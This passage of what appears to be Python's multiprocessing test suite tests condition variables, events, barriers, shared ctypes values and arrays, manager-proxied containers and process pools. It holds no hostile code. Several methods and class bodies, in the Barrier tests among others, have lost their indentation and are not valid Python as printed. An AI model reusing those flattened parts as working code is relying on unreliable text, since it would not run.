        p.daemon = True
        p.start()
        self.assertTrue(sem.acquire(timeout=TIMEOUT))
        # Only increment 3 times, so state == 4 is never reached.
        for i in range(3):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()
        join_process(p)
        self.assertTrue(success.value)
    @classmethod
    def _test_wait_result(cls, c, pid):
        # Child target: notify the waiting parent, then (on POSIX) send it
        # SIGINT so its next wait raises KeyboardInterrupt.
        with c:
            c.notify()
        time.sleep(1)
        if pid is not None:
            os.kill(pid, signal.SIGINT)
    def test_wait_result(self):
        if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
            pid = os.getpid()
        else:
            pid = None
        c = self.Condition()
        with c:
            self.assertFalse(c.wait(0))
            self.assertFalse(c.wait(0.1))
            p = self.Process(target=self._test_wait_result, args=(c, pid))
            p.start()
            self.assertTrue(c.wait(60))
            if pid is not None:
                self.assertRaises(KeyboardInterrupt, c.wait, 60)
        p.join()
class _TestEvent(BaseTestCase):
    """Tests for Event set/clear/wait semantics."""
    @classmethod
    def _test_event(cls, event):
        # Child target: set the event after a delay.
        time.sleep(TIMEOUT2)
        event.set()
    def test_event(self):
        event = self.Event()
        wait = TimingWrapper(event.wait)
        # Removed temporarily, due to API shear, this does not
        # work with threading._Event objects. is_set == isSet
        self.assertEqual(event.is_set(), False)
        # Removed, threading.Event.wait() will return the value of the __flag
        # instead of None. API Shear with the semaphore backed mp.Event
        self.assertEqual(wait(0.0), False)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
        event.set()
        # See note above on the API differences
        self.assertEqual(event.is_set(), True)
        self.assertEqual(wait(), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        # self.assertEqual(event.is_set(), True)
        event.clear()
        #self.assertEqual(event.is_set(), False)
        p = self.Process(target=self._test_event, args=(event,))
        p.daemon = True
        p.start()
        self.assertEqual(wait(), True)
        p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
    # Shared-memory counter standing in for the list-as-atomic-counter
    # idiom of the threading.Barrier tests: append() increments the count,
    # len() reads it, and the state pickles across processes.
    def __init__(self):
        wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
        lock = multiprocessing.Lock()
        self.__setstate__((wrapper, lock))
        self._lengthbuf[0] = 0
    def __setstate__(self, state):
        # Also runs when unpickling in a child; rebuilds the memoryview.
        (self._wrapper, self._lock) = state
        self._lengthbuf = self._wrapper.create_memoryview().cast('i')
    def __getstate__(self):
        return (self._wrapper, self._lock)
    def append(self, _):
        # The appended value is ignored; only the count matters.
        with self._lock:
            self._lengthbuf[0] += 1
    def __len__(self):
        with self._lock:
            return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
    """
    A bunch of threads.
    """
    def __init__(self, namespace, f, args, n, wait_before_exit=False):
        """
        Construct a bunch of `n` threads running the same function `f`.
        If `wait_before_exit` is True, the threads won't terminate until
        do_finish() is called.
        """
        # Despite the name, workers are namespace.Process objects — real
        # processes or threads depending on the test mixin in use.
        self.f = f
        self.args = args
        self.n = n
        self.started = namespace.DummyList()
        self.finished = namespace.DummyList()
        self._can_exit = namespace.Event()
        if not wait_before_exit:
            self._can_exit.set()
        threads = []
        for i in range(n):
            p = namespace.Process(target=self.task)
            p.daemon = True
            p.start()
            threads.append(p)
        def finalize(threads):
            for p in threads:
                p.join()
        # Join all workers at the latest when this Bunch is finalized.
        self._finalizer = weakref.finalize(self, finalize, threads)
    def task(self):
        # Worker body: record start, run f, record finish, then hold the
        # worker alive until do_finish() allows it to exit.
        pid = os.getpid()
        self.started.append(pid)
        try:
            self.f(*self.args)
        finally:
            self.finished.append(pid)
            self._can_exit.wait(30)
            assert self._can_exit.is_set()
    def wait_for_started(self):
        while len(self.started) < self.n:
            _wait()
    def wait_for_finished(self):
        while len(self.finished) < self.n:
            _wait()
    def do_finish(self):
        self._can_exit.set()
    def close(self):
        # Run the finalizer now (joins all workers).
        self._finalizer()
class AppendTrue(object):
    """Picklable callable that appends True to the wrapped sequence on each call."""
    def __init__(self, obj):
        self.obj = obj
    def __call__(self):
        target = self.obj
        target.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
    def setUp(self):
        # Fresh N-party barrier with a generous default timeout per test.
        self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
    def tearDown(self):
        # Break the barrier so any straggling waiters are released.
        self.barrier.abort()
        self.barrier = None
    def DummyList(self):
        # Return a list-like atomic counter appropriate for the current
        # test flavor: a plain list for threads, a managed list for
        # managers, and a shared-memory _DummyList for processes.
        if self.TYPE == 'threads':
            return []
        elif self.TYPE == 'manager':
            return self.manager.list()
        else:
            return _DummyList()
    def run_threads(self, f, args):
        # Run f(*args) in N-1 workers plus the current thread, so all
        # N barrier parties participate; always join the workers.
        b = Bunch(self, f, args, self.N-1)
        try:
            f(*args)
            b.wait_for_finished()
        finally:
            b.close()
    @classmethod
    def multipass(cls, barrier, results, n):
        # Cross the barrier n times in lockstep, checking after each wait
        # that every party finished the previous phase before any party
        # entered the next one.
        m = barrier.parties
        assert m == cls.N
        for i in range(n):
            results[0].append(True)
            assert len(results[1]) == i * m
            barrier.wait()
            results[1].append(True)
            assert len(results[0]) == (i + 1) * m
            barrier.wait()
        try:
            assert barrier.n_waiting == 0
        except NotImplementedError:
            pass
        assert not barrier.broken
    def test_barrier(self, passes=1):
        """
        Test that a barrier is passed in lockstep
        """
        results = [self.DummyList(), self.DummyList()]
        self.run_threads(self.multipass, (self.barrier, results, passes))
    def test_barrier_10(self):
        """
        Test that a barrier works for 10 consecutive runs
        """
        return self.test_barrier(10)
    @classmethod
    def _test_wait_return_f(cls, barrier, queue):
        # Worker: report the index returned by barrier.wait().
        res = barrier.wait()
        queue.put(res)
    def test_wait_return(self):
        """
        test the return value from barrier.wait
        """
        queue = self.Queue()
        self.run_threads(self._test_wait_return_f, (self.barrier, queue))
        results = [queue.get() for i in range(self.N)]
        # Exactly one of the N parties receives index 0.
        self.assertEqual(results.count(0), 1)
        close_queue(queue)
    @classmethod
    def _test_action_f(cls, barrier, results):
        # Worker: after the wait, the barrier action must have run once.
        barrier.wait()
        if len(results) != 1:
            raise RuntimeError
    def test_action(self):
        """
        Test the 'action' callback
        """
        results = self.DummyList()
        barrier = self.Barrier(self.N, action=AppendTrue(results))
        self.run_threads(self._test_action_f, (barrier, results))
        self.assertEqual(len(results), 1)
    @classmethod
    def _test_abort_f(cls, barrier, results1, results2):
        # Worker: one party (index N//2) aborts the barrier; every other
        # party must then see BrokenBarrierError on its second wait.
        try:
            i = barrier.wait()
            if i == cls.N//2:
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()
    def test_abort(self):
        """
        Test that an abort will put the barrier in a broken state
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        self.run_threads(self._test_abort_f,
                         (self.barrier, results1, results2))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertTrue(self.barrier.broken)
    @classmethod
    def _test_reset_f(cls, barrier, results1, results2, results3):
        # Worker: one party (index N//2) resets the barrier once everyone
        # else is waiting; the waiters see BrokenBarrierError, then all
        # parties must be able to pass the reset barrier again.
        i = barrier.wait()
        if i == cls.N//2:
            # Wait until the other threads are all in the barrier.
            while barrier.n_waiting < cls.N-1:
                time.sleep(0.001)
            barrier.reset()
        else:
            try:
                barrier.wait()
                results1.append(True)
            except threading.BrokenBarrierError:
                results2.append(True)
        # Now, pass the barrier again
        barrier.wait()
        results3.append(True)
    def test_reset(self):
        """
        Test that a 'reset' on a barrier frees the waiting threads
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        self.run_threads(self._test_reset_f,
                         (self.barrier, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertEqual(len(results3), self.N)
    @classmethod
    def _test_abort_and_reset_f(cls, barrier, barrier2,
                                results1, results2, results3):
        # Worker: break `barrier` via abort, then use `barrier2` to
        # coordinate a safe reset before crossing `barrier` once more.
        try:
            i = barrier.wait()
            if i == cls.N//2:
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()
        # Synchronize and reset the barrier. Must synchronize first so
        # that everyone has left it when we reset, and after so that no
        # one enters it before the reset.
        if barrier2.wait() == cls.N//2:
            barrier.reset()
        barrier2.wait()
        barrier.wait()
        results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
    @classmethod
    def _test_timeout_f(cls, barrier, results):
        """Worker: every thread's timed wait should break when one is late."""
        i = barrier.wait()
        if i == cls.N//2:
            # One thread is late!
            time.sleep(1.0)
        try:
            # 0.5s timeout expires before the late thread arrives, so the
            # barrier breaks for everyone.
            barrier.wait(0.5)
        except threading.BrokenBarrierError:
            results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
    @classmethod
    def _test_default_timeout_f(cls, barrier, results):
        """Worker: the constructor-supplied default timeout should apply."""
        i = barrier.wait(cls.defaultTimeout)
        if i == cls.N//2:
            # One thread is later than the default timeout
            time.sleep(1.0)
        try:
            # No explicit timeout: the barrier's own timeout= value is used.
            barrier.wait()
        except threading.BrokenBarrierError:
            results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
    @classmethod
    def _test_thousand_f(cls, barrier, passes, conn, lock):
        """Worker: cross the barrier *passes* times, reporting each pass number.

        The lock serializes writes so messages on the shared pipe do not
        interleave.
        """
        for i in range(passes):
            barrier.wait()
            with lock:
                conn.send(i)
    def test_thousand(self):
        """Stress test: N processes make 1000 lock-step passes of the barrier.

        Because the barrier prevents any process from starting pass i+1
        before every process has reported pass i, the parent must receive
        the pass numbers in non-decreasing batches of N.
        """
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        passes = 1000
        lock = self.Lock()
        conn, child_conn = self.Pipe(False)
        for j in range(self.N):
            p = self.Process(target=self._test_thousand_f,
                           args=(self.barrier, passes, child_conn, lock))
            p.start()
            self.addCleanup(p.join)
        for i in range(passes):
            for j in range(self.N):
                self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
    """Tests for shared ctypes scalars (multiprocessing.Value / RawValue)."""
    ALLOWED_TYPES = ('processes',)
    # Each entry is (typecode, initial value, value the child writes back).
    codes_values = [
        ('i', 4343, 24234),
        ('d', 3.625, -4.25),
        ('h', -232, 234),
        ('q', 2 ** 33, 2 ** 34),
        ('c', latin('x'), latin('y'))
        ]
    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")
    @classmethod
    def _test(cls, values):
        # Child process: overwrite each shared value with the third element.
        for sv, cv in zip(values, cls.codes_values):
            sv.value = cv[2]
    def test_value(self, raw=False):
        # A Value keeps its initial contents, and writes made by a child
        # process are visible to the parent afterwards.
        if raw:
            values = [self.RawValue(code, value)
                      for code, value, _ in self.codes_values]
        else:
            values = [self.Value(code, value)
                      for code, value, _ in self.codes_values]
        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[1])
        proc = self.Process(target=self._test, args=(values,))
        proc.daemon = True
        proc.start()
        proc.join()
        for sv, cv in zip(values, self.codes_values):
            self.assertEqual(sv.value, cv[2])
    def test_rawvalue(self):
        self.test_value(raw=True)
    def test_getobj_getlock(self):
        # lock=True (default), lock=None and an explicit lock all expose
        # get_lock()/get_obj(); lock=False and RawValue expose neither.
        val1 = self.Value('i', 5)
        lock1 = val1.get_lock()
        obj1 = val1.get_obj()
        val2 = self.Value('i', 5, lock=None)
        lock2 = val2.get_lock()
        obj2 = val2.get_obj()
        lock = self.Lock()
        val3 = self.Value('i', 5, lock=lock)
        lock3 = val3.get_lock()
        obj3 = val3.get_obj()
        self.assertEqual(lock, lock3)
        arr4 = self.Value('i', 5, lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))
        # A 'lock' argument that is neither a lock nor a bool is rejected.
        self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
        arr5 = self.RawValue('i', 5)
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
    """Tests for shared ctypes arrays (multiprocessing.Array / RawArray)."""
    ALLOWED_TYPES = ('processes',)
    @classmethod
    def f(cls, seq):
        # Replace seq in place with its running (prefix) sums.
        for i in range(1, len(seq)):
            seq[i] += seq[i-1]
    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array(self, raw=False):
        # Shared arrays support len, indexing, slicing and slice assignment,
        # and mutations made in a child process are visible to the parent.
        seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
        if raw:
            arr = self.RawArray('i', seq)
        else:
            arr = self.Array('i', seq)
        self.assertEqual(len(arr), len(seq))
        self.assertEqual(arr[3], seq[3])
        self.assertEqual(list(arr[2:7]), list(seq[2:7]))
        arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
        self.assertEqual(list(arr[:]), seq)
        # Apply the same mutation locally and in a child process; the
        # shared array must end up matching the local list.
        self.f(seq)
        p = self.Process(target=self.f, args=(arr,))
        p.daemon = True
        p.start()
        p.join()
        self.assertEqual(list(arr[:]), seq)
    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_array_from_size(self):
        size = 10
        # Test for zeroing (see issue #11675).
        # The repetition below strengthens the test by increasing the chances
        # of previously allocated non-zero memory being used for the new array
        # on the 2nd and 3rd loops.
        for _ in range(3):
            arr = self.Array('i', size)
            self.assertEqual(len(arr), size)
            self.assertEqual(list(arr), [0] * size)
            arr[:] = range(10)
            self.assertEqual(list(arr), list(range(10)))
            del arr
    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_rawarray(self):
        self.test_array(raw=True)
    @unittest.skipIf(c_int is None, "requires _ctypes")
    def test_getobj_getlock_obj(self):
        # Mirrors _TestValue.test_getobj_getlock for arrays.
        arr1 = self.Array('i', list(range(10)))
        lock1 = arr1.get_lock()
        obj1 = arr1.get_obj()
        arr2 = self.Array('i', list(range(10)), lock=None)
        lock2 = arr2.get_lock()
        obj2 = arr2.get_obj()
        lock = self.Lock()
        arr3 = self.Array('i', list(range(10)), lock=lock)
        lock3 = arr3.get_lock()
        obj3 = arr3.get_obj()
        self.assertEqual(lock, lock3)
        arr4 = self.Array('i', range(10), lock=False)
        self.assertFalse(hasattr(arr4, 'get_lock'))
        self.assertFalse(hasattr(arr4, 'get_obj'))
        self.assertRaises(AttributeError,
                          self.Array, 'i', range(10), lock='notalock')
        arr5 = self.RawArray('i', range(10))
        self.assertFalse(hasattr(arr5, 'get_lock'))
        self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
    """Tests for manager-proxied containers: list, dict and Namespace."""
    ALLOWED_TYPES = ('manager',)
    def test_list(self):
        a = self.list(list(range(10)))
        self.assertEqual(a[:], list(range(10)))
        b = self.list()
        self.assertEqual(b[:], [])
        b.extend(list(range(5)))
        self.assertEqual(b[:], list(range(5)))
        self.assertEqual(b[2], 2)
        self.assertEqual(b[2:10], [2,3,4])
        b *= 2
        self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
        self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
        self.assertEqual(a[:], list(range(10)))
        # A proxied list of proxies still dereferences element contents.
        d = [a, b]
        e = self.list(d)
        self.assertEqual(
            [element[:] for element in e],
            [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
            )
        f = self.list([a])
        a.append('hello')
        self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
    def test_list_iter(self):
        a = self.list(list(range(10)))
        it = iter(a)
        self.assertEqual(list(it), list(range(10)))
        self.assertEqual(list(it), [])  # exhausted
        # list modified during iteration
        it = iter(a)
        a[0] = 100
        self.assertEqual(next(it), 100)
    def test_list_proxy_in_list(self):
        # Nested list proxies: mutating an inner proxy is visible through
        # the outer one, and inner proxies stay independent of each other.
        a = self.list([self.list(range(3)) for _i in range(3)])
        self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
        a[0][-1] = 55
        self.assertEqual(a[0][:], [0, 1, 55])
        for i in range(1, 3):
            self.assertEqual(a[i][:], [0, 1, 2])
        self.assertEqual(a[1].pop(), 2)
        self.assertEqual(len(a[1]), 2)
        for i in range(0, 3, 2):
            self.assertEqual(len(a[i]), 3)
        del a
        # A self-referential proxied list must not break deletion.
        b = self.list()
        b.append(b)
        del b
    def test_dict(self):
        d = self.dict()
        indices = list(range(65, 70))
        for i in indices:
            d[i] = chr(i)
        self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
        self.assertEqual(sorted(d.keys()), indices)
        self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
        self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
    def test_dict_iter(self):
        d = self.dict()
        indices = list(range(65, 70))
        for i in indices:
            d[i] = chr(i)
        it = iter(d)
        self.assertEqual(list(it), indices)
        self.assertEqual(list(it), [])  # exhausted
        # dictionary changed size during iteration
        it = iter(d)
        d.clear()
        self.assertRaises(RuntimeError, next, it)
    def test_dict_proxy_nested(self):
        # Nested dict proxies: writes through the outer proxy are visible
        # through the inner one and vice versa; dropping local references
        # does not invalidate the server-side objects.
        pets = self.dict(ferrets=2, hamsters=4)
        supplies = self.dict(water=10, feed=3)
        d = self.dict(pets=pets, supplies=supplies)
        self.assertEqual(supplies['water'], 10)
        self.assertEqual(d['supplies']['water'], 10)
        d['supplies']['blankets'] = 5
        self.assertEqual(supplies['blankets'], 5)
        self.assertEqual(d['supplies']['blankets'], 5)
        d['supplies']['water'] = 7
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(d['supplies']['water'], 7)
        del pets
        del supplies
        self.assertEqual(d['pets']['ferrets'], 2)
        d['supplies']['blankets'] = 11
        self.assertEqual(d['supplies']['blankets'], 11)
        pets = d['pets']
        supplies = d['supplies']
        supplies['water'] = 7
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(d['supplies']['water'], 7)
        d.clear()
        self.assertEqual(len(d), 0)
        self.assertEqual(supplies['water'], 7)
        self.assertEqual(pets['hamsters'], 4)
        l = self.list([pets, supplies])
        l[0]['marmots'] = 1
        self.assertEqual(pets['marmots'], 1)
        self.assertEqual(l[0]['marmots'], 1)
        del pets
        del supplies
        self.assertEqual(l[0]['marmots'], 1)
        # A plain (non-proxied) list stays a plain list inside a proxy.
        outer = self.list([[88, 99], l])
        self.assertIsInstance(outer[0], list)  # Not a ListProxy
        self.assertEqual(outer[-1][-1]['feed'], 3)
    def test_namespace(self):
        n = self.Namespace()
        n.name = 'Bob'
        n.job = 'Builder'
        n._hidden = 'hidden'
        self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
        del n.job
        # Attributes with a leading underscore are hidden from repr().
        self.assertEqual(str(n), "Namespace(name='Bob')")
        self.assertTrue(hasattr(n, 'name'))
        self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
    """Return *x* squared, after sleeping for *wait* seconds."""
    time.sleep(wait)
    return x * x
def mul(x, y):
    """Return the product of *x* and *y*."""
    return x * y
def raise_large_valuerror(wait):
    """Sleep for *wait* seconds, then raise a ValueError with a ~1 MiB message."""
    time.sleep(wait)
    raise ValueError("x" * 1024**2)
def identity(x):
    """Return the argument unchanged."""
    return x
class CountedObject(object):
    """Object that keeps a class-level tally of how many instances are alive."""
    n_instances = 0
    def __new__(cls):
        # Count in __new__ rather than __init__ so allocation itself is
        # what increments the tally.
        cls.n_instances += 1
        return object.__new__(cls)
    def __del__(self):
        type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
    """Yield 0..total-1, raising SayWhenError upon reaching index *when*.

    A *when* of -1 raises before anything is yielded.
    """
    if when == -1:
        raise SayWhenError("Somebody said when")
    i = 0
    while i < total:
        if i == when:
            raise SayWhenError("Somebody said when")
        yield i
        i += 1
class _TestPool(BaseTestCase):
    """Tests for multiprocessing.Pool: the apply/map/imap families, error
    propagation, timeouts, termination and reference management.

    One shared 4-worker pool is created per test class; tests that need a
    special configuration build their own pool.
    """
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.pool = cls.Pool(4)
    @classmethod
    def tearDownClass(cls):
        cls.pool.terminate()
        cls.pool.join()
        cls.pool = None
        super().tearDownClass()
    def test_apply(self):
        """apply() forwards positional and keyword arguments to the target."""
        papply = self.pool.apply
        self.assertEqual(papply(sqr, (5,)), sqr(5))
        self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
    def test_map(self):
        """map() matches builtin map(), with and without an explicit chunksize."""
        pmap = self.pool.map
        self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
        self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
                         list(map(sqr, list(range(100)))))
    def test_starmap(self):
        """starmap() matches itertools.starmap()."""
        psmap = self.pool.starmap
        tuples = list(zip(range(10), range(9,-1, -1)))
        self.assertEqual(psmap(mul, tuples),
                         list(itertools.starmap(mul, tuples)))
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(psmap(mul, tuples, chunksize=20),
                         list(itertools.starmap(mul, tuples)))
    def test_starmap_async(self):
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
                         list(itertools.starmap(mul, tuples)))
    def test_map_async(self):
        self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
                         list(map(sqr, list(range(10)))))
    def test_map_async_callbacks(self):
        # callback receives the result list; error_callback the exception.
        call_args = self.manager.list() if self.TYPE == 'manager' else []
        self.pool.map_async(int, ['1'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(1, len(call_args))
        self.assertEqual([1], call_args[0])
        self.pool.map_async(int, ['a'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(2, len(call_args))
        self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
        # (Renamed from the misspelled 'test_map_unplicklable'.)
        # Issue #19425 -- failure to pickle should not cause a hang
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class A(object):
            def __reduce__(self):
                raise RuntimeError('cannot pickle')
        with self.assertRaises(RuntimeError):
            self.pool.map(sqr, [A()]*10)
    def test_map_chunksize(self):
        try:
            self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
        except multiprocessing.TimeoutError:
            self.fail("pool.map_async with chunksize stalled on null list")
    def test_map_handle_iterable_exception(self):
        """An exception raised while consuming the input iterable propagates."""
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very first of the iterable
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
        # again, make sure it's reentrant
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
        class SpecialIterable:
            def __iter__(self):
                return self
            def __next__(self):
                raise SayWhenError
            def __len__(self):
                return 1
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)
    def test_async(self):
        res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
        get = TimingWrapper(res.get)
        self.assertEqual(get(), 49)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
    def test_async_timeout(self):
        res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
        get = TimingWrapper(res.get)
        self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
    def test_imap(self):
        it = self.pool.imap(sqr, list(range(10)))
        self.assertEqual(list(it), list(map(sqr, list(range(10)))))
        it = self.pool.imap(sqr, list(range(10)))
        for i in range(10):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)
        it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
        for i in range(1000):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)
    def test_imap_handle_iterable_exception(self):
        """imap() surfaces input-iterable exceptions from __next__."""
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
        for i in range(3):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
        # SayWhenError seen at start of problematic chunk's results
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
        for i in range(6):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
        for i in range(4):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
    def test_imap_unordered(self):
        it = self.pool.imap_unordered(sqr, list(range(10)))
        self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
        it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
        self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
    def test_imap_unordered_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(10, 3),
                                      1)
        expected_values = list(map(sqr, list(range(10))))
        with self.assertRaises(SayWhenError):
            # imap_unordered makes it difficult to anticipate the SayWhenError
            for i in range(10):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(20, 7),
                                      2)
        expected_values = list(map(sqr, list(range(20))))
        with self.assertRaises(SayWhenError):
            for i in range(20):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)
    def test_make_pool(self):
        """A pool must have a strictly positive number of workers."""
        expected_error = (RemoteError if self.TYPE == 'manager'
                          else ValueError)
        self.assertRaises(expected_error, self.Pool, -1)
        self.assertRaises(expected_error, self.Pool, 0)
        if self.TYPE != 'manager':
            p = self.Pool(3)
            try:
                self.assertEqual(3, len(p._pool))
            finally:
                p.close()
                p.join()
    def test_terminate(self):
        result = self.pool.map_async(
            time.sleep, [0.1 for i in range(10000)], chunksize=1
            )
        self.pool.terminate()
        join = TimingWrapper(self.pool.join)
        join()
        # Sanity check the pool didn't wait for all tasks to finish
        self.assertLess(join.elapsed, 2.0)
    def test_empty_iterable(self):
        # See Issue 12157
        p = self.Pool(1)
        self.assertEqual(p.map(sqr, []), [])
        self.assertEqual(list(p.imap(sqr, [])), [])
        self.assertEqual(list(p.imap_unordered(sqr, [])), [])
        self.assertEqual(p.map_async(sqr, []).get(), [])
        p.close()
        p.join()
    def test_context(self):
        """A Pool used as a context manager terminates on exit."""
        if self.TYPE == 'processes':
            L = list(range(10))
            expected = [sqr(i) for i in L]
            with self.Pool(2) as p:
                r = p.map_async(sqr, L)
                self.assertEqual(r.get(), expected)
            p.join()
            self.assertRaises(ValueError, p.map_async, sqr, L)
    @classmethod
    def _test_traceback(cls):
        raise RuntimeError(123) # some comment
    def test_traceback(self):
        # We want ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
        if self.TYPE == 'processes':
            with self.Pool(1) as p:
                try:
                    p.apply(self._test_traceback)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected RuntimeError')
            p.join()
